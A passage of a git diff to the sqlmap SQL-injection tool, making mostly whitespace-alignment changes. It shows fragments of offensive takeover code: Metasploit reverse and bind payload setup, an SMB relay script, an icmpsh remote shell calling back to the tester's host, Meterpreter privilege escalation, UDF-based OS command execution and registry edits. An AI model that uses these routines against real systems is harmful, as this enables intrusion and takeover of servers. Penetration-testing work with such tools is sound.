self.__versionAlt = None - self.__servicePack = "" - self.__info = info + self.__release = None + self.__version = "" + self.__versionAlt = None + self.__servicePack = "" + self.__info = info def __feedInfo(self, key, value): value = sanitizeStr(value) @@ -73,8 +73,8 @@ class MSSQLBannerHandler(ContentHandler): self.__feedInfo("dbmsServicePack", self.__servicePack) break - self.__version = "" - self.__versionAlt = None + self.__version = "" + self.__versionAlt = None self.__servicePack = "" elif name == "version": diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py index 2a41e117e..b5ff6b06e 100644 --- a/lib/parse/cmdline.py +++ b/lib/parse/cmdline.py @@ -571,7 +571,7 @@ def cmdLineParser(): if not any([args.direct, args.url, args.list, args.googleDork, args.configFile, \ args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.realTest, args.wizard]): - errMsg = "missing a mandatory parameter ('-d', '-u', '-l', '-r', '-g', '-c', '--wizard' or '--update'), " + errMsg = "missing a mandatory parameter ('-d', '-u', '-l', '-r', '-g', '-c', '--wizard' or '--update'), " errMsg += "-h for help" parser.error(errMsg) diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py index e5b477b3d..5b789be94 100644 --- a/lib/parse/configfile.py +++ b/lib/parse/configfile.py @@ -42,7 +42,7 @@ def configFileProxy(section, option, boolean=False, integer=False): else: conf[option] = None else: - debugMsg = "missing requested option '%s' (section " % option + debugMsg = "missing requested option '%s' (section " % option debugMsg += "'%s') into the configuration file, " % section debugMsg += "ignoring. Skipping to next." logger.debug(debugMsg) @@ -66,12 +66,12 @@ def configFileParser(configFile): if not config.has_section("Target"): raise NoSectionError, "Target in the configuration file is mandatory" - condition = not config.has_option("Target", "url") + condition = not config.has_option("Target", "url") condition &= not config.has_option("Target", "list") condition &= not config.has_option("Target", "googleDork") if condition: - errMsg = "missing a mandatory option in the configuration " + errMsg = "missing a mandatory option in the configuration " errMsg += "file (url, list or googleDork)" raise sqlmapMissingMandatoryOptionException, errMsg diff --git a/lib/parse/handler.py b/lib/parse/handler.py index b8649435e..375099fd4 100644 --- a/lib/parse/handler.py +++ b/lib/parse/handler.py @@ -20,12 +20,12 @@ class FingerprintHandler(ContentHandler): def __init__(self, banner, info): ContentHandler.__init__(self) - self.__banner = sanitizeStr(banner) - self.__regexp = None - self.__match = None + self.__banner = sanitizeStr(banner) + self.__regexp = None + self.__match = None self.__dbmsVersion = None self.__techVersion = None - self.__info = info + self.__info = info def __feedInfo(self, key, value): value = sanitizeStr(value) @@ -45,7 +45,7 @@ class FingerprintHandler(ContentHandler): def startElement(self, name, attrs): if name == "regexp": self.__regexp = sanitizeStr(attrs.get("value")) - self.__match = re.search(self.__regexp, self.__banner, re.I | re.M) + self.__match = re.search(self.__regexp, self.__banner, re.I | re.M) if name == "info" and self.__match: self.__feedInfo("type", attrs.get("type")) @@ -55,7 +55,7 @@ class FingerprintHandler(ContentHandler): self.__dbmsVersion = sanitizeStr(attrs.get("dbms_version")) self.__techVersion = sanitizeStr(attrs.get("tech_version")) - self.__sp = sanitizeStr(attrs.get("sp")) + self.__sp = sanitizeStr(attrs.get("sp")) if self.__dbmsVersion.isdigit(): self.__feedInfo("dbmsVersion", self.__match.group(int(self.__dbmsVersion))) @@ -68,7 +68,7 @@ class FingerprintHandler(ContentHandler): if self.__sp.isdigit(): self.__feedInfo("sp", "Service Pack %s" % self.__match.group(int(self.__sp))) - self.__regexp = None - self.__match = None + self.__regexp = None + self.__match = None self.__dbmsVersion = None self.__techVersion = None diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 1f27838e0..7fcb56bca 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py @@ -40,7 +40,7 @@ def headersParser(headers): for header in headers: if header in topHeaders.keys(): - value = headers[header] + value = headers[header] xmlfile = topHeaders[header] checkFile(xmlfile) diff --git a/lib/parse/html.py b/lib/parse/html.py index e76333992..022c4053f 100644 --- a/lib/parse/html.py +++ b/lib/parse/html.py @@ -26,12 +26,12 @@ class htmlHandler(ContentHandler): def __init__(self, page): ContentHandler.__init__(self) - self.__dbms = None - self.__page = page + self.__dbms = None + self.__page = page self.__regexp = None - self.__match = None + self.__match = None - self.dbms = None + self.dbms = None def startElement(self, name, attrs): if name == "dbms": diff --git a/lib/request/basic.py b/lib/request/basic.py index 0804c4796..949753f83 100644 --- a/lib/request/basic.py +++ b/lib/request/basic.py @@ -129,7 +129,7 @@ def checkCharEncoding(encoding): try: codecs.lookup(encoding) except LookupError: - warnMsg = "unknown web page charset '%s'. " % encoding + warnMsg = "unknown web page charset '%s'. " % encoding warnMsg += "Please report by e-mail to %s." % ML singleTimeLogMessage(warnMsg, logging.WARN, encoding) encoding = None @@ -143,7 +143,7 @@ def getHeuristicCharEncoding(page): """ retVal = detect(page)['encoding'] - infoMsg = "heuristics detected web page charset '%s'" % retVal + infoMsg = "heuristics detected web page charset '%s'" % retVal singleTimeLogMessage(infoMsg, logging.INFO, retVal) return retVal diff --git a/lib/request/connect.py b/lib/request/connect.py index 9e4ab5fde..f82a338d5 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -84,31 +84,31 @@ class Connect: # dirty hack because urllib2 just skips the other part of provided url # splitted with space char while urlencoding it in the later phase - url = kwargs.get('url', conf.url).replace(" ", "%20") + url = kwargs.get('url', conf.url).replace(" ", "%20") - get = kwargs.get('get', None) - post = kwargs.get('post', None) - method = kwargs.get('method', None) - cookie = kwargs.get('cookie', None) - ua = kwargs.get('ua', None) - referer = kwargs.get('referer', None) - direct = kwargs.get('direct', False) - multipart = kwargs.get('multipart', False) - silent = kwargs.get('silent', False) - raise404 = kwargs.get('raise404', True) - auxHeaders = kwargs.get('auxHeaders', None) - response = kwargs.get('response', False) - ignoreTimeout = kwargs.get('ignoreTimeout', False) - refreshing = kwargs.get('refreshing', False) + get = kwargs.get('get', None) + post = kwargs.get('post', None) + method = kwargs.get('method', None) + cookie = kwargs.get('cookie', None) + ua = kwargs.get('ua', None) + referer = kwargs.get('referer', None) + direct = kwargs.get('direct', False) + multipart = kwargs.get('multipart', False) + silent = kwargs.get('silent', False) + raise404 = kwargs.get('raise404', True) + auxHeaders = kwargs.get('auxHeaders', None) + response = kwargs.get('response', False) + ignoreTimeout = kwargs.get('ignoreTimeout', False) + refreshing = kwargs.get('refreshing', False) - page = "" - cookieStr = "" - requestMsg = "HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, conf.method) - requestMsg += "%s" % urlparse.urlsplit(url)[2] or "/" - responseMsg = "HTTP response " - requestHeaders = "" + page = "" + cookieStr = "" + requestMsg = "HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, conf.method) + requestMsg += "%s" % urlparse.urlsplit(url)[2] or "/" + responseMsg = "HTTP response " + requestHeaders = "" responseHeaders = None - logHeaders = "" + logHeaders = "" try: if silent: @@ -192,7 +192,7 @@ class Connect: cookieStr = "Cookie: " cookie = getUnicode(cookie) - index = cookie.index(" for ") + index = cookie.index(" for ") cookieStr += "%s; " % cookie[8:index] @@ -228,7 +228,7 @@ class Connect: kb.redirectSetCookie = conn.setcookie if hasattr(conn, "redurl") and hasattr(conn, "redcode") and not conf.redirectHandled and not conf.realTest: - msg = "sqlmap got a %d redirect to " % conn.redcode + msg = "sqlmap got a %d redirect to " % conn.redcode msg += "%s - What target address do you " % conn.redurl msg += "want to use from now on? %s " % conf.url msg += "(default) or provide another target address based " @@ -304,7 +304,7 @@ class Connect: responseHeaders[URI_HTTP_HEADER] = e.geturl() page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) except socket.timeout: - warnMsg = "connection timed out while trying " + warnMsg = "connection timed out while trying " warnMsg += "to get error page information (%d)" % e.code logger.warn(warnMsg) return None, None @@ -334,7 +334,7 @@ class Connect: logger.log(7, responseMsg) if e.code == 401: - errMsg = "not authorized, try to provide right HTTP " + errMsg = "not authorized, try to provide right HTTP " errMsg += "authentication type and valid credentials (%d)" % code raise sqlmapConnectionException, errMsg elif e.code == 404 and raise404: @@ -359,7 +359,7 @@ class Connect: elif "URLError" in tbMsg or "error" in tbMsg: warnMsg = "unable to connect to the target url" elif "BadStatusLine" in tbMsg: - warnMsg = "the target url responded with an unknown HTTP " + warnMsg = "the target url responded with an unknown HTTP " warnMsg += "status code, try to force the HTTP User-Agent " warnMsg += "header with option --user-agent or --random-agent" elif "IncompleteRead" in tbMsg: @@ -420,15 +420,15 @@ class Connect: if conf.direct: return direct(value, content) - get = None - post = None - cookie = None - ua = None - referer = None - page = None - pageLength = None - uri = None - raise404 = place != PLACE.URI if raise404 is None else raise404 + get = None + post = None + cookie = None + ua = None + referer = None + page = None + pageLength = None + uri = None + raise404 = place != PLACE.URI if raise404 is None else raise404 if not place: place = kb.injection.place @@ -505,7 +505,7 @@ class Connect: if stdev(kb.responseTimes) > WARN_TIME_STDEV: kb.adjustTimeDelay = False - warnMsg = "there is considerable lagging in connection " + warnMsg = "there is considerable lagging in connection " warnMsg += "response(s). Please use as high value for " warnMsg += "--time-sec option as possible (e.g. 10 or more)" logger.critical(warnMsg) diff --git a/lib/request/direct.py b/lib/request/direct.py index 4ae6435a8..16c21b99d 100644 --- a/lib/request/direct.py +++ b/lib/request/direct.py @@ -49,7 +49,7 @@ def direct(query, content=True): except: output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) - infoMsg = "resumed from file '%s': " % conf.sessionFile + infoMsg = "resumed from file '%s': " % conf.sessionFile infoMsg += "%s..." % getUnicode(output, UNICODE_ENCODING)[:20] logger.info(infoMsg) else: diff --git a/lib/request/proxy.py b/lib/request/proxy.py index 66ce939ec..5ffc188b2 100644 --- a/lib/request/proxy.py +++ b/lib/request/proxy.py @@ -85,10 +85,10 @@ class ProxyHTTPSConnection(ProxyHTTPConnection): # Make the sock ssl-aware if PYVERSION >= "2.6": - sslobj = ssl.wrap_socket(self.sock, self.key_file, self.cert_file) + sslobj = ssl.wrap_socket(self.sock, self.key_file, self.cert_file) self.sock = sslobj else: - sslobj = socket.ssl(self.sock, self.key_file, self.cert_file) + sslobj = socket.ssl(self.sock, self.key_file, self.cert_file) self.sock = httplib.FakeSocket(self.sock, sslobj) class ProxyHTTPHandler(urllib2.HTTPHandler): diff --git a/lib/request/redirecthandler.py b/lib/request/redirecthandler.py index 12bb1d947..bc76be7e5 100644 --- a/lib/request/redirecthandler.py +++ b/lib/request/redirecthandler.py @@ -67,7 +67,7 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): try: content = fp.read() except Exception, msg: - dbgMsg = "there was a problem while retrieving " + dbgMsg = "there was a problem while retrieving " dbgMsg += "redirect response content (%s)" % msg logger.debug(dbgMsg) @@ -81,7 +81,7 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): try: content = fp.read() except Exception, msg: - dbgMsg = "there was a problem while retrieving " + dbgMsg = "there was a problem while retrieving " dbgMsg += "redirect response content (%s)" % msg logger.debug(dbgMsg) @@ -90,6 +90,6 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler): def infinite_loop_check(self, req): if hasattr(req, 'redirect_dict') and (req.redirect_dict.get(req.get_full_url(), 0) >= self.max_repeats or len(req.redirect_dict) >= self.max_redirections): - errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys()) + errMsg = "infinite redirect loop detected (%s). " % ", ".join(item for item in req.redirect_dict.keys()) errMsg += "please check all provided parameters and/or provide missing ones." raise sqlmapConnectionException, errMsg diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py index 321848c8b..d6992ca61 100644 --- a/lib/takeover/abstraction.py +++ b/lib/takeover/abstraction.py @@ -70,8 +70,8 @@ class Abstraction(Web, UDF, xp_cmdshell): getOutput = None if not self.alwaysRetrieveCmdOutput: - message = "do you want to retrieve the command standard " - message += "output? [Y/n/a] " + message = "do you want to retrieve the command standard " + message += "output? [Y/n/a] " getOutput = readInput(message, default="Y") if getOutput in ("a", "A"): @@ -89,19 +89,19 @@ class Abstraction(Web, UDF, xp_cmdshell): def shell(self): if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - infoMsg = "calling OS shell. To quit type " + infoMsg = "calling OS shell. To quit type " infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) else: if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ): - infoMsg = "going to use injected sys_eval and sys_exec " + infoMsg = "going to use injected sys_eval and sys_exec " infoMsg += "user-defined functions for operating system " infoMsg += "command execution" logger.info(infoMsg) elif Backend.getIdentifiedDbms() == DBMS.MSSQL: - infoMsg = "going to use xp_cmdshell extended procedure for " + infoMsg = "going to use xp_cmdshell extended procedure for " infoMsg += "operating system command execution" logger.info(infoMsg) @@ -109,7 +109,7 @@ class Abstraction(Web, UDF, xp_cmdshell): errMsg = "feature not yet implemented for the back-end DBMS" raise sqlmapUnsupportedFeatureException, errMsg - infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows") + infoMsg = "calling %s OS shell. To quit type " % (Backend.getOs() or "Windows") infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) @@ -148,7 +148,7 @@ class Abstraction(Web, UDF, xp_cmdshell): self.checkDbmsOs(detailed) if mandatory and not self.isDba(): - warnMsg = "the functionality requested might not work because " + warnMsg = "the functionality requested might not work because " warnMsg += "the session user is not a database administrator" logger.warn(warnMsg) diff --git a/lib/takeover/icmpsh.py b/lib/takeover/icmpsh.py index f5ca6f8aa..2c83c5046 100644 --- a/lib/takeover/icmpsh.py +++ b/lib/takeover/icmpsh.py @@ -30,11 +30,11 @@ class ICMPsh: """ def __initVars(self): - self.lhostStr = None - self.rhostStr = None - self.localIP = getLocalIP() - self.remoteIP = getRemoteIP() - self.__icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe")) + self.lhostStr = None + self.rhostStr = None + self.localIP = getLocalIP() + self.remoteIP = getRemoteIP() + self.__icmpslave = normalizePath(os.path.join(paths.SQLMAP_EXTRAS_PATH, "icmpsh", "icmpsh.exe")) def __selectRhost(self): message = "which is the back-end DBMS address? [%s] " % self.remoteIP @@ -59,7 +59,7 @@ class ICMPsh: icmpshmaster(self.lhostStr, self.rhostStr) def __runIcmpshSlaveRemote(self): - infoMsg = "running icmpsh slave remotely" + infoMsg = "running icmpsh slave remotely" logger.info(infoMsg) cmd = "%s -t %s -d 500 -b 30 -s 128 &" % (self.__icmpslaveRemote, self.lhostStr) @@ -90,7 +90,7 @@ class ICMPsh: self.__runIcmpshSlaveRemote() self.__runIcmpshMaster() - debugMsg = "icmpsh master exited" + debugMsg = "icmpsh master exited" logger.debug(debugMsg) time.sleep(1) diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py index 26b535849..51520d817 100644 --- a/lib/takeover/metasploit.py +++ b/lib/takeover/metasploit.py @@ -50,22 +50,22 @@ class Metasploit: """ def __initVars(self): - self.connectionStr = None - self.lhostStr = None - self.rhostStr = None - self.portStr = None - self.payloadStr = None - self.encoderStr = None + self.connectionStr = None + self.lhostStr = None + self.rhostStr = None + self.portStr = None + self.payloadStr = None + self.encoderStr = None self.payloadConnStr = None - self.resourceFile = None - self.localIP = getLocalIP() - self.remoteIP = getRemoteIP() - self.__msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli")) - self.__msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole")) - self.__msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode")) - self.__msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload")) + self.resourceFile = None + self.localIP = getLocalIP() + self.remoteIP = getRemoteIP() + self.__msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli")) + self.__msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole")) + self.__msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode")) + self.__msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload")) - self.__msfPayloadsList = { + self.__msfPayloadsList = { "windows": { 1: ( "Meterpreter (default)", "windows/meterpreter" ), 2: ( "Shell", "windows/shell" ), @@ -88,7 +88,7 @@ class Metasploit: } } - self.__msfEncodersList = { + self.__msfEncodersList = { "windows": { 1: ( "No Encoder", "generic/none" ), 2: ( "Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed" ), @@ -106,14 +106,14 @@ class Metasploit: } } - self.__msfSMBPortsList = { + self.__msfSMBPortsList = { "windows": { 1: ( "139/TCP", "139" ), 2: ( "445/TCP (default)", "445" ), } } - self.__portData = { + self.__portData = { "bind": "remote port number", "reverse": "local port number", } @@ -175,7 +175,7 @@ class Metasploit: def __selectPayload(self): if Backend.isOs(OS.WINDOWS) and conf.privEsc: - infoMsg = "forcing Metasploit payload to Meterpreter because " + infoMsg = "forcing Metasploit payload to Meterpreter because " infoMsg += "it is the only payload that can be used to " infoMsg += "escalate privileges, either via 'incognito' " infoMsg += "extension or via 'getsystem' command" @@ -190,7 +190,7 @@ class Metasploit: choose = False if Backend.getIdentifiedDbms() == DBMS.MYSQL: - debugMsg = "by default MySQL on Windows runs as SYSTEM " + debugMsg = "by default MySQL on Windows runs as SYSTEM " debugMsg += "user, it is likely that the the VNC " debugMsg += "injection will be successful" logger.debug(debugMsg) @@ -198,7 +198,7 @@ class Metasploit: elif Backend.getIdentifiedDbms() == DBMS.PGSQL: choose = True - warnMsg = "by default PostgreSQL on Windows runs as " + warnMsg = "by default PostgreSQL on Windows runs as " warnMsg += "postgres user, it is unlikely that the VNC " warnMsg += "injection will be successful" logger.warn(warnMsg) @@ -206,14 +206,14 @@ class Metasploit: elif Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")): choose = True - warnMsg = "it is unlikely that the VNC injection will be " + warnMsg = "it is unlikely that the VNC injection will be " warnMsg += "successful because usually Microsoft SQL Server " warnMsg += "%s runs as Network Service " % Backend.getVersion() warnMsg += "or the Administrator is not logged in" logger.warn(warnMsg) if choose: - message = "what do you want to do?\n" + message = "what do you want to do?\n" message += "[1] Give it a try anyway\n" message += "[2] Fall back to Meterpreter payload (default)\n" message += "[3] Fall back to Shell payload" @@ -289,12 +289,12 @@ class Metasploit: return self.__skeletonSelection("connection type", self.__msfConnectionsList) def __prepareIngredients(self, encode=True): - self.connectionStr = self.__selectConnection() - self.lhostStr = self.__selectLhost() - self.rhostStr = self.__selectRhost() - self.portStr = self.__selectPort() - self.payloadStr = self.__selectPayload() - self.encoderStr = self.__selectEncoder(encode) + self.connectionStr = self.__selectConnection() + self.lhostStr = self.__selectLhost() + self.rhostStr = self.__selectRhost() + self.portStr = self.__selectPort() + self.payloadStr = self.__selectPayload() + self.encoderStr = self.__selectEncoder(encode) if self.payloadStr == "linux/x86/shell": self.payloadConnStr = "%s_%s" % (self.payloadStr, self.connectionStr) @@ -302,7 +302,7 @@ class Metasploit: self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr) def __forgeMsfCliCmd(self, exitfunc="process"): - self.__cliCmd = "%s multi/handler PAYLOAD=%s" % (self.__msfCli, self.payloadConnStr) + self.__cliCmd = "%s multi/handler PAYLOAD=%s" % (self.__msfCli, self.payloadConnStr) self.__cliCmd += " EXITFUNC=%s" % exitfunc self.__cliCmd += " LPORT=%s" % self.portStr #self.__cliCmd += " ExitOnSession=true" @@ -327,7 +327,7 @@ class Metasploit: self.__prepareIngredients(encode=False) - self.__resource = "use windows/smb/smb_relay\n" + self.__resource = "use windows/smb/smb_relay\n" self.__resource += "set SRVHOST %s\n" % self.lhostStr self.__resource += "set SRVPORT %s\n" % self.__selectSMBPort() self.__resource += "set PAYLOAD %s\n" % self.payloadConnStr @@ -348,7 +348,7 @@ class Metasploit: self.resourceFp.close() def __forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None): - self.__payloadCmd = "%s %s" % (self.__msfPayload, self.payloadConnStr) + self.__payloadCmd = "%s %s" % (self.__msfPayload, self.payloadConnStr) self.__payloadCmd += " EXITFUNC=%s" % exitfunc self.__payloadCmd += " LPORT=%s" % self.portStr #self.__payloadCmd += " ExitOnSession=true" @@ -370,7 +370,7 @@ class Metasploit: def __runMsfCli(self, exitfunc): self.__forgeMsfCliCmd(exitfunc) - infoMsg = "running Metasploit Framework 3 command line " + infoMsg = "running Metasploit Framework 3 command line " infoMsg += "interface locally, please wait.." logger.info(infoMsg) @@ -385,14 +385,14 @@ class Metasploit: self.__msfConsoleProc = execute(self.__consoleCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE) def __runMsfShellcodeRemote(self): - infoMsg = "running Metasploit Framework 3 shellcode " + infoMsg = "running Metasploit Framework 3 shellcode " infoMsg += "remotely via UDF 'sys_bineval', please wait.." logger.info(infoMsg) self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval") def __runMsfShellcodeRemoteViaSexec(self): - infoMsg = "running Metasploit Framework 3 shellcode remotely " + infoMsg = "running Metasploit Framework 3 shellcode remotely " infoMsg += "via shellcodeexec, please wait.." logger.info(infoMsg) @@ -421,14 +421,14 @@ class Metasploit: if conf.privEsc: print - infoMsg = "trying to escalate privileges using Meterpreter " + infoMsg = "trying to escalate privileges using Meterpreter " infoMsg += "'getsystem' command which tries different " infoMsg += "techniques, including kitrap0d" logger.info(infoMsg) proc.stdin.write("getsystem\n") - infoMsg = "displaying the list of Access Tokens availables. " + infoMsg = "displaying the list of Access Tokens availables. " infoMsg += "Choose which user you want to impersonate by " infoMsg += "using incognito's command 'impersonate_token' if " infoMsg += "'getsystem' does not success to elevate privileges" @@ -469,7 +469,7 @@ class Metasploit: blockingWriteToFD(sys.stdout.fileno(), out) # For --os-pwn and --os-bof - pwnBofCond = self.connectionStr.startswith("reverse") + pwnBofCond = self.connectionStr.startswith("reverse") pwnBofCond &= "Starting the payload handler" in out # For --os-smbrelay @@ -574,7 +574,7 @@ class Metasploit: if self.connectionStr.startswith("bind"): func() - debugMsg = "Metasploit Framework 3 command line interface exited " + debugMsg = "Metasploit Framework 3 command line interface exited " debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, func) logger.debug(debugMsg) @@ -596,7 +596,7 @@ class Metasploit: self.__runMsfConsole() - debugMsg = "Metasploit Framework 3 console exited with return " + debugMsg = "Metasploit Framework 3 console exited with return " debugMsg += "code %s" % self.__controlMsfCmd(self.__msfConsoleProc, self.uncPathRequest) logger.debug(debugMsg) @@ -608,6 +608,6 @@ class Metasploit: if self.connectionStr.startswith("bind"): self.spHeapOverflow() - debugMsg = "Metasploit Framework 3 command line interface exited " + debugMsg = "Metasploit Framework 3 command line interface exited " debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, self.spHeapOverflow) logger.debug(debugMsg) diff --git a/lib/takeover/registry.py b/lib/takeover/registry.py index 8f953cd74..0c1d843b8 100644 --- a/lib/takeover/registry.py +++ b/lib/takeover/registry.py @@ -19,14 +19,14 @@ class Registry: """ def __initVars(self, regKey, regValue, regType=None, regData=None, parse=False): - self.__regKey = regKey - self.__regValue = regValue - self.__regType = regType - self.__regData = regData + self.__regKey = regKey + self.__regValue = regValue + self.__regType = regType + self.__regData = regData - self.__randStr = randomStr(lowercase=True) + self.__randStr = randomStr(lowercase=True) self.__batPathRemote = "%s/tmpr%s.bat" % (conf.tmpPath, self.__randStr) - self.__batPathLocal = os.path.join(conf.outputPath, "tmpr%s.bat" % self.__randStr) + self.__batPathLocal = os.path.join(conf.outputPath, "tmpr%s.bat" % self.__randStr) if parse: readParse = "FOR /F \"tokens=*\" %%A IN ('REG QUERY \"" + self.__regKey + "\" /v \"" + self.__regValue + "\"') DO SET value=%%A\r\nECHO %value%\r\n" @@ -38,12 +38,12 @@ class Registry: readParse ) - self.__batAdd = ( + self.__batAdd = ( "@ECHO OFF\r\n", "REG ADD \"%s\" /v \"%s\" /t %s /d %s /f" % (self.__regKey, self.__regValue, self.__regType, self.__regData) ) - self.__batDel = ( + self.__batDel = ( "@ECHO OFF\r\n", "REG DELETE \"%s\" /v \"%s\" /f" % (self.__regKey, self.__regValue) ) @@ -97,7 +97,7 @@ class Registry: self.__initVars(regKey, regValue, regType, regData) self.__createRemoteBatchFile() - debugMsg = "adding registry key value '%s' " % self.__regValue + debugMsg = "adding registry key value '%s' " % self.__regValue debugMsg += "to registry key '%s'" % self.__regKey logger.debug(debugMsg) @@ -110,7 +110,7 @@ class Registry: self.__initVars(regKey, regValue) self.__createRemoteBatchFile() - debugMsg = "deleting registry key value '%s' " % self.__regValue + debugMsg = "deleting registry key value '%s' " % self.__regValue debugMsg += "from registry key '%s'" % self.__regKey logger.debug(debugMsg) diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py index 97b02406e..41d0347b3 100644 --- a/lib/takeover/udf.py +++ b/lib/takeover/udf.py @@ -35,14 +35,14 @@ class UDF: """ def __init__(self): - self.createdUdf = set() - self.udfs = {} + self.createdUdf = set() + self.udfs = {} self.udfToCreate = set() def __askOverwriteUdf(self, udf): - message = "UDF '%s' already exists, do you " % udf + message = "UDF '%s' already exists, do you " % udf message += "want to overwrite it? [y/N] " - output = readInput(message, default="N") + output = readInput(message, default="N") if output and output[0] in ("y", "Y"): return True @@ -61,7 +61,7 @@ class UDF: return False def udfCheckAndOverwrite(self, udf): - exists = self.__checkExistUdf(udf) + exists = self.__checkExistUdf(udf) overwrite = True if exists: @@ -78,7 +78,7 @@ class UDF: def udfExecCmd(self, cmd, silent=False, udfName=None): if udfName is None: - cmd = "'%s'" % cmd + cmd = "'%s'" % cmd udfName = "sys_exec" cmd = unescaper.unescape(cmd) @@ -87,7 +87,7 @@ class UDF: def udfEvalCmd(self, cmd, first=None, last=None, udfName=None): if udfName is None: - cmd = "'%s'" % cmd + cmd = "'%s'" % cmd udfName = "sys_eval" cmd = unescaper.unescape(cmd) @@ -167,7 +167,7 @@ class UDF: self.checkDbmsOs() if not self.isDba(): - warnMsg = "the functionality requested might not work because " + warnMsg = "the functionality requested might not work because " warnMsg += "the session user is not a database administrator" logger.warn(warnMsg) @@ -193,19 +193,19 @@ class UDF: raise sqlmapMissingMandatoryOptionException(errMsg) elif self.udfLocalFile.endswith(".so") and Backend.isOs(OS.WINDOWS): - errMsg = "you provided a shared object as shared library, but " + errMsg = "you provided a shared object as shared library, but " errMsg += "the database underlying operating system is Windows" raise sqlmapMissingMandatoryOptionException(errMsg) elif self.udfLocalFile.endswith(".dll") and Backend.isOs(OS.LINUX): - errMsg = "you provided a dynamic-link library as shared library, " + errMsg = "you provided a dynamic-link library as shared library, " errMsg += "but the database underlying operating system is Linux" raise sqlmapMissingMandatoryOptionException(errMsg) self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0] - self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1] + self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1] - msg = "how many user-defined functions do you want to create " + msg = "how many user-defined functions do you want to create " msg += "from the shared library? " while True: @@ -228,7 +228,7 @@ class UDF: for x in range(0, udfCount): while True: - msg = "what is the name of the UDF number %d? " % (x + 1) + msg = "what is the name of the UDF number %d? " % (x + 1) udfName = readInput(msg) if udfName: @@ -245,8 +245,8 @@ class UDF: self.udfs[udfName]["input"] = [] default = 1 - msg = "how many input parameters takes UDF " - msg += "'%s'? (default: %d) " % (udfName, default) + msg = "how many input parameters takes UDF " + msg += "'%s'? (default: %d) " % (udfName, default) while True: parCount = readInput(msg, default=default) @@ -262,8 +262,8 @@ class UDF: logger.warn("invalid value, only digits >= 0 are allowed") for y in range(0, parCount): - msg = "what is the data-type of input parameter " - msg += "number %d? (default: %s) " % ((y + 1), defaultType) + msg = "what is the data-type of input parameter " + msg += "number %d? (default: %s) " % ((y + 1), defaultType) while True: parType = readInput(msg, default=defaultType) @@ -275,7 +275,7 @@ class UDF: self.udfs[udfName]["input"].append(parType) break - msg = "what is the data-type of the return " + msg = "what is the data-type of the return " msg += "value? (default: %s) " % defaultType while True: @@ -289,8 +289,8 @@ class UDF: self.udfInjectCore(self.udfs) - msg = "do you want to call your injected user-defined " - msg += "functions now? [Y/n/q] " + msg = "do you want to call your injected user-defined " + msg += "functions now? [Y/n/q] " choice = readInput(msg, default="Y") if choice[0] in ( "n", "N" ): @@ -302,7 +302,7 @@ class UDF: while True: udfList = [] - msg = "which UDF do you want to call?" + msg = "which UDF do you want to call?" for udf in self.udfs.keys(): udfList.append(udf) @@ -321,16 +321,16 @@ class UDF: elif isinstance(choice, int) and choice > 0 and choice <= len(udfList): break else: - warnMsg = "invalid value, only digits >= 1 and " + warnMsg = "invalid value, only digits >= 1 and " warnMsg += "<= %d are allowed" % len(udfList) logger.warn(warnMsg) - cmd = "" - count = 1 + cmd = "" + count = 1 udfToCall = udfList[choice - 1] for inp in self.udfs[udfToCall]["input"]: - msg = "what is the value of the parameter number " + msg = "what is the value of the parameter number " msg += "%d (data-type: %s)? " % (count, inp) while True: @@ -348,9 +348,9 @@ class UDF: count += 1 - cmd = cmd[:-1] - msg = "do you want to retrieve the return value of the " - msg += "UDF? [Y/n] " + cmd = cmd[:-1] + msg = "do you want to retrieve the return value of the " + msg += "UDF? [Y/n] " choice = readInput(msg, default="Y") if choice[0] in ("y", "Y"): @@ -363,7 +363,7 @@ class UDF: else: self.udfExecCmd(cmd, udfName=udfToCall, silent=True) - msg = "do you want to call this or another injected UDF? [Y/n] " + msg = "do you want to call this or another injected UDF? [Y/n] " choice = readInput(msg, default="Y") if choice[0] not in ("y", "Y"): diff --git a/lib/takeover/web.py b/lib/takeover/web.py index 90cea6641..3e917deec 100644 --- a/lib/takeover/web.py +++ b/lib/takeover/web.py @@ -46,11 +46,11 @@ class Web: 